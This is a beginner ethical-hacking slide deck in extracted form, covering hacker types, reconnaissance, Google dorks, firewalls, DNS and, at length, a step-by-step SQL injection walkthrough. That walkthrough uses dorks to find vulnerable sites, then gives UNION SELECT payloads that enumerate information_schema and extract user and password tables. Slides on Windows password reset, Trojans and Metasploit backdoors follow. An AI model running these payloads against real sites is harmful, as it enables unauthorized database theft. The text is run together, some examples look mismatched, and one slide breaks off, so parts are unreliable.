Introduction to HackingHacking is the art of manipulating things suchthat it works the way ; it wasn’t supposed todo.So, the term ‘Hacking’ is not only confined tothe world of computers only.EX : Opening the car window using a ruler
Who am I ?Hacker is a person who loves to explore thetechnology and takes it to next level.According to some stereotypes, Hackingtoday refers to breaking in computer systemwithout authorization, which is a criminaloffense as per law.The person who uses their hacking skills formalicious purpose is called cracker .
Types of HackerWhite Hat | Grey Hat | Black Hat
Technical Level of HackersNeophyte – A Newbie in the field ofComputer Security with almost noknowledge.Script Kiddie – A non-expert who usesTools or Scripts made by other Hackersinto System with little knowledge aboutthe concept working behind the tool.Elite – Also known as 1337, it is a termused to describe the most technicallyadvanced hackers who use cutting edgetechnology.
IS HACKING LEGAL?Yes, Hacking is legal, if you are authorized forthe same i.e hired to find Vulnerabilities.This is the job of an ETHICAL HACKEREthical Hacker is a person who uses theirhacking skills for finding security loop holes orvulnerabilities in hiring TARGET system andreports the flaws to administrator of thecompany.
Security TriangleDefines Balance between Security , Functionality and Ease of useAs security increases, the system’s functionality and ease of use decreases .
STEPS OF ETHICAL HACKING1.Informationgathering2. Scanning3. GainingAccess4. GeneratingReport5. Reportvunerability
Footprinting• Process of creating a blueprint or map of anorganization’s network and systems.• Or It is a technique of gathering informationform various Sources.• Generally, a hacker spends 90percent of the time profilingand gathering information ona target and 10 percent of thetime launching the attack.
Sources of Information• Media – TV , News etc• Social Network – facebook, Twitter, Google+• Search Engine – Google, Yahoo, Bing• People Search – Yahoo! People, 123people.cometc.• Domain name Lookups – Whois, SamSpade,Nslookup, Domain name lookup, DnsStuff• Network Range - ARIN, IANA,• Geographic Map – Traceroute, NeoTrace,VisualRoute• “Every single bit of information can useful”
Sources of InformationOnline Lookups• Whois , ARIN , Centralops, SamSpade• DNSstuff, Visual Trace, NeoTraceSocial Network + People Search• Facebook, Google + , Twitter• Yahoo! People, 123peopleSearch Engines, News Groups• Google news, iGoogle• Google, Yahoo, Bing, Ask
What is firewall?Firewalls are software program or hardwaredevices that works as a filter between yourcomputer (or network) and internet dependingupon a set of rules.It is similar to security guard at entrance whoprevents intruders to enter the houseand also prevents convicts fromescaping out.Firewalls are of two types:1. Software firewalls 2. Hardware firewalls
Software firewalls• Used by individual home users• Installed on your computer as an application software.• Runs in background and monitors the network activity.• Ex: windows firewall, Black ice defender, kaspersky internetsecurity, AVG internet security etc.•
• It is a device that guards the entrance to a network, not anindividual computer.• Basically, installed between your broadbandcable or DSL modem and your computers.• Provides higher level of security than software firewalls.Hardware firewall
What is DNS?• DNS stands for Domain Name Server.• It was difficult to remember ip address for eachwebsites, so it came into action.• It maintains table that contains domian names vs ipaddress columns in its database.• Used for translating domain names into theirrespective ip address.• Ex : facebook.com = 220.127.116.11• Stores frequently used domains in its cache.• Ex : Google’s open DNS server : 18.104.22.168
Google HackingFounders of Google:Sergey Brin and Larry Page“Google Hacking” doesn’t mean“How to hack Google? ”.It is skill to extract valuableinformation from web with thehelp of special keywords called“GOOGLE DORKS”Main idea is to “Pick a vulnerability, find the site”.
How Google works?• Google Bots : Bots are computer program that automaticallybrowse the world wide web in some order. These are also calledweb crawlers, spiders, ants or robots. Google uses mainly two bots : Crawlers : It traverses over the web following the links found ondifferent pages. When it finds any new page, sends its link to spider. Spiders : It is a robotic browser like program that downloads the webpages associated with the link send by crawlers.• Indexer : It dissects and sorts each word, images etc on the everyweb page downloaded by spiders.• The Database is a warehouse for storing the pages downloaded andprocessed.• Search Engine Results : Depending upon search keywords, it digssearch results out of the database following an algorithm.
Google : Server sideGoogle botsCrawler finds new pages via• URL submission at http://google.com/addurl.html• Following different links present on each webpage.Spiders download these webpages on google servers
Basics of Google Hacking+ Forces the word to be searched +firefox , will bring up results thatcontains the word firefox.- Eliminates the word from search results -chrome, will bring up results thatdoesn’t contains word chrome“ ” delimiters for entire search phrases(not single words)“Internet Explorer" will returndocuments containing the phraseInternet Explorer. Single letter wildcard Krazzy.hack will search for words likekrazzy@hack, krazzy2hack, krazzy-hack, krazzy_hack etc.* Single word wildcard hack * planet will search for wordslike hack the planet, hack for planet,hack all planet etc.| logical OR firefox|chrome will returndocuments containing either firefoxor chrome but not both.
Google query : keywords - Isite Restricts the search within thespecified domain.site:xyz.com will show all pages onxyz.com crawled by Google botsintitle restricts results to documents whosetitle contains the specified wordintitle:fox fire will find all sites withthe word fox in thetitle and fire in the textallintitle restricts results to documents whosetitle contains all the specifiedphrasesallintitle:fox fire will find all sites withthe words fox and fire in the title, soits equivalent to intitle:fox intitle:fireinurl restricts the results to sites whoseURL contains specified wordinurl:hacker will find sites whose urlcontain word hacker.allinurl restricts results to sites whose URLcontains all the specified phrasesallinurl:hacker vs cracker will find thesites whose url contains hacker vscrackerfiletype Filters search to specified filetypes filetype:pdf Google hacking willshow all the pdf documentscontaining word Google hacking
Google query : keywords -IIlink restricts results to sitescontaining links to the specifiedlocationlink:www.google.com will returndocuments containing one or morelinks to www.google.cominanchor restricts results to sitescontaining anchored text withthe specified wordinanchor: backtrack will returndocuments that has fire as anchoredtext (not url)allintext restricts results to documentscontaining the specified phrasein the text only.allintext:“kevin Mitnik" will returndocuments which contain the phrasekevin Mitnik in their text onlynumrange restricts results to documentscontaining a number from thespecified Rangenumrange:1-100 fire will return sitescontaining a number from 1 to 100 andthe word fire. The same result can beachieved with 1..100 firecache Shows cache version of URL cache:xyz.com will show how the sitelooked , the last time Google botsvisited the site.
Advanced Google Dorks• Inurl:view/index.shtml• Inurl:view/view.shtml
System HackingWhere windows installs passwordReset windows logon passwordPlay with sticky keysOPHCRACKMake a folder System HiddenEnable/Disable USB devicesMake Drives invisibleMake a undeletable folderTrojans
SQL Injection• What is Database?- Collection of logically related data- It is similar to Attendance register• Define Table ?- It combination of rows and columns• What is SQL ?- SQL stands for Structured Query Language.- Used to select the information from database
Basic SQL queriesCreate a table• Create table users(name varchar2(30), email varchar(50),password varchar(30), address varchar2(100));Extracting data from table• Select name, email, password from users;• Select * from users where email=‘firstname.lastname@example.org’ ANDpassword=‘s3cr3t’;• Select * from users order by name;
Basics of SQL Injection• How to find a site that is vulnerable to sqlinjection attack?- Use Google dorks- Inurl:view_faculty.php?id=- Inurl:viz.php?id=- Inurl:list.php?id=- Use Vunerability scanner- Acutenix- W3af
What happens in background??• Check if site is vulnerable or not?- Ex : http://xyz.com/list.php?id=3Select name, email, password from users whereid =3;- Ex : http://xyz.com/list.php?id=3’Select name, email, password from users whereid =3’;THIS WILL GIVE AN ERROR MESSAGE, MEANS WECAN DIRECTLY COMMUICATE WITH DATABASE !!
So WHAT’s NEXT???• We will try to find no of columns in the Tablehttp://xyz.com/list.php?id=3+order+by+1-- Select name, email, password from users where id =3order by 1--- It will extract name, email, passowrd from users tableand sort the contents by 1st column; So it will give youfresh original webpage. Select name, email, password from users where id =3order by 100—- It will extract name, email, passowrd from users table andsort the contents by 100th column; There isn’t any 100thcolumn so it will give you error.
Finding columns• So , we will increment ‘order by value by 1’untill we get errorhttp://xyz.com/list.php?id=3+order+by+1--http://xyz.com/list.php?id=3+order+by+2--http://xyz.com/list.php?id=3+order+by+3--::http://xyz.com/list.php?id=3+order+by+7--The above query returns error , means there are6 columns current table.
Find the Vulnerable column• We select all the columns i.e from 1-6http://xyz.com/list.php?id=3+union+all+select+1,2,3,4,5,6--• Try to find the vulnerable column that willretuurn datahttp://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,6--IT WILL RETURN THE NOS OF VULNERABLECOLUMN i.e 1,2,3,4,5 or 6.
SQLi cont..• Suppose it returns 2 and 6http://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,6--• Then we can fetch any information in database atthese column noshttp://xyz.com/list.php?id=-3+union+all+select+1,@@version,3,4,5,database()--This will return the version of database and name of database.SYSTEM VARIABLES@@version : Returns Version of database@@user : Returns the user Currently logged in@@database : Returns the name of database
Information Schema• Most of the websites use Mysql Databases forstoring their information.• MySQl has ‘INFORMATION_SCHEMA’ databasewhich keeps record of all the schemas , tables andColumns in the server.• INFORMATION_SCHEMA.SCHEMATA storesshema details.• INFORMATION_SCHEMA.TABLES stores all theinformation regarding tables in the database.• INFORMATION_SCHEMA.COLUMNS storesinformation of all the columns in all the tables.
SQLi Cont…• The below query will extract all the database inthe current server.http://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,group_concat(schema_name) from information_schema.schemata—• Below code will extract all the tables in currentdbhttp://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,group_conact(table_name) from information_schema.tables—
SQLi Cont…• Extract all the Columns from the current tablehttp://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,group_conact(column_name) from information_schema.columnswhere table_name=‘users’—• Extract all the
Metasploit Framework• It is a framework to exploit the services foundduring Scanning Phase• You can create virus infected files .. Using thisframework within a couple of minutes• After Breaking into the system, You can setbackdoor, download files , upload files, disablemouse, disable keyboard…and lots more• We have provided a detailed full length HDvideo tutorial in the DVD and a ebook